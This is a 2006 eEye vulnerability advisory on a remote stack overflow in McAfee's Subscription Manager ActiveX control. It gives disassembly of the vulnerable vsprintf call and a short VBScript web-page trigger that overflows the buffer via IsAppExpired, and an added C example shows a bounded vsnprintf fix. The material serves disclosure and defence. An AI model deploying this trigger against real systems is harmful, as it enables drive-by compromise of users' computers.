eEye Advisory AD20060807
McAfee Subscription Manager Stack Buffer Overflow

Release Date:
August 5, 2006

Date Reported:
July 19, 2006

Patch Development Time (In Days):
17  

Severity:
Critical

Vendor:
McAfee

Systems Affected:
McAfee AntiSpyware 1.x, 2.x
McAfee Internet Security Suite 6.x, 7.x, 8.x
McAfee Personal Firewall Plus 5.x, 6.x, 7.x
McAfee Privacy Service 6.x, 7.x, 8.x
McAfee QuickClean 4.x, 5.x, 6.x
McAfee SpamKiller 5.x, 6.x, 7.x
McAfee VirusScan 8.x, 9.x, 10.x
McAfee Wireless Home Network Security 1.x

Overview:
eEye Digital Security has discovered a vulnerability in McAfee Security Center, which ships with all McAfee consumer products. It is a remote code execution vulnerability in the Subscription Manager ActiveX control that allows an attacker to take complete control of the affected computer.

Technical Details:
A stack buffer overflow vulnerability exists in McAfee’s Subscription Manager ActiveX control, which is shipped with all Home and Home Business products. McSubMgr.dll is the manager module that controls the subscription of a particular product, ensuring that the software has not exceeded its subscription time and performing various maintenance checks (e.g. expirations, old applications). Unfortunately, McSubMgr.dll is marked safe for scripting, so its members can be called from a web page by referencing its CLSID and passing arguments to them. The vulnerability occurs when a string of over 3000 bytes is passed through one of several members to a vsprintf call that writes into a fixed-size stack buffer, causing a stack overflow.

.text:02B0B27F var_BB8 = byte ptr -0BB8h <-- 3000 bytes
.text:02B0B27F arg_0 = dword ptr 8
.text:02B0B27F arg_4 = byte ptr 0Ch
.text:02B0B27F
.text:02B0B27F push ebp
.text:02B0B280 mov ebp, esp
.text:02B0B282 sub esp, 0BB8h
.text:02B0B288 lea eax, [ebp+arg_4]
.text:02B0B28B push eax ; va_list
.text:02B0B28C push [ebp+arg_0] ; char *
.text:02B0B28F lea eax, [ebp+var_BB8]
.text:02B0B295 push eax ; char *
.text:02B0B296 mov [ebp+var_BB8], 0
.text:02B0B29D call _vsprintf <-- Exploitable vsprintf
.text:02B0B2A2 add esp, 0Ch
.text:02B0B2A5 leave
.text:02B0B2A6 retn
.text:02B0B2A6 sub_2B0B27F endp

Since there is no bounds checking on the vsprintf, a string exceeding 3000 bytes passed into the 3000-byte buffer overflows it, and arbitrary code can be executed. To exploit this vulnerability over the Internet, an attacker must first create a web page with scripting that instantiates the ActiveX object and calls one of the affected methods, passing data through to the vulnerable vsprintf.

<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='Red'></object>
<script language="VBScript">
GK=String(165001, "a")
Red.IsAppExpired GK
</script>

The above snippet sends 165001 ‘a’ characters to the IsAppExpired ActiveX member, completely overflowing the stack buffer.
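The vsprintf pattern from the listing next to a bounded replacement, as an added C example that is not from the advisory or from McAfee's code; MSG_BUF_SIZE, unsafe_format, safe_format and input_fits are names chosen here, and the run of 'a' characters is constructed input mirroring the String(165001, "a") trigger.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MSG_BUF_SIZE 3000 /* same size as the 0BB8h frame in the listing */

/* Shape of the vulnerable routine (sub_2B0B27F above): vsprintf writes the
 * fully expanded string into a 3000-byte stack buffer with no length limit.
 * Shown only for the pattern; calling it with over-long input is undefined
 * behaviour, so nothing below invokes it. */
void unsafe_format(const char *fmt, ...)
{
    char buf[MSG_BUF_SIZE];
    va_list ap;
    va_start(ap, fmt);
    vsprintf(buf, fmt, ap); /* unbounded: writes past buf[2999] */
    va_end(ap);
}

/* Hardened replacement: vsnprintf never writes more than out_size bytes and
 * returns the length the full output would have needed, so the caller can
 * detect truncation instead of silently corrupting the stack.
 * Returns 1 if the output fit (including the NUL), 0 if it was truncated. */
int safe_format(char *out, size_t out_size, const char *fmt, ...)
{
    va_list ap;
    int needed;
    va_start(ap, fmt);
    needed = vsnprintf(out, out_size, fmt, ap);
    va_end(ap);
    if (needed < 0) return 0;          /* encoding error */
    return (size_t)needed < out_size;  /* fits only if needed <= 2999 */
}

/* Models the advisory's trigger: formats a constructed run of n 'a'
 * characters into a MSG_BUF_SIZE stack buffer and reports whether it fit. */
int input_fits(size_t n)
{
    char *s = malloc(n + 1);
    char buf[MSG_BUF_SIZE];
    int ok;
    if (!s) return 0;
    memset(s, 'a', n);
    s[n] = '\0';
    ok = safe_format(buf, sizeof buf, "%s", s);
    free(s);
    return ok;
}
```

A 2999-byte string is the longest that fits; 3000 bytes or the advisory's 165001 bytes are reported as truncated rather than written past the buffer.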

Protection:
Retina Network Security Scanner has been updated to identify this vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from this vulnerability.

Vendor Status:
For more information, see the knowledgebase article McAfee has published at http://ts.mcafeehelp.com/faq3.asp?docid=407052

Credit:
Karl Lynn

Greetings:
Derek, Barnaby, Dre, Hugo, CSam, Barbara Parker, HD Moore, and GK for the intelligent conversation at the Shadow Bar.. See Ya Next Tuesday ;)

Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.